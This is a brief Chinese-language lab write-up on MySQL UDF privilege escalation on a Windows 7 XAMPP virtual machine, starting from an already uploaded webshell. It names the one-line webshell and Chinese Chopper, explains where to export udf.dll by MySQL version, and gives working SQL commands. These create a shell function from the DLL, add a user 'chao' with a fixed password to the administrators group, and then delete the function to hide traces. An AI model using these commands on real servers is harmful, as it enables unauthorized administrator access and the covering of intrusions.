为什么要提权?
当需要执行系统命令的时候,比如添加管理员,就需要提权
实验环境
虚拟机下win7 64位,使用xampp集成包,
条件:getshell
利用UDF提权
验证是否拿下网站
shell.php写有一句话木马
上传udf.php文件,进行访问
输入数据库的密码
数据库版本
mysql数据库版本在5.1以下的可以直接导出到默认位置,即
C:\\xampp\\mysql\\lib\\plugin\\\\udf.dll
mysql数据库版本为5.5.47,所以需要修改导出位置
C:\\windows\\system32\\\\udf.dll
导出成功
如果C:\\xampp\\mysql\\lib下没有plugin文件,可以通过中国菜刀新建plugin文件
copy
然后依次执行以下命令
网上的代码不知道怎么执行不了,发现没有cmdshell函数
后来发现竟然可以这样
CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll';
select shell('cmd','net user chao 123456 /add');
select shell('cmd','net localgroup administrators chao /add');
drop function shell;//删除函数
delete from mysql.func where name='shell';//删除函数
添加管理员
我还发现竟然有帮助提示
各种函数
查看进程
关机的帮助命令
参考文章
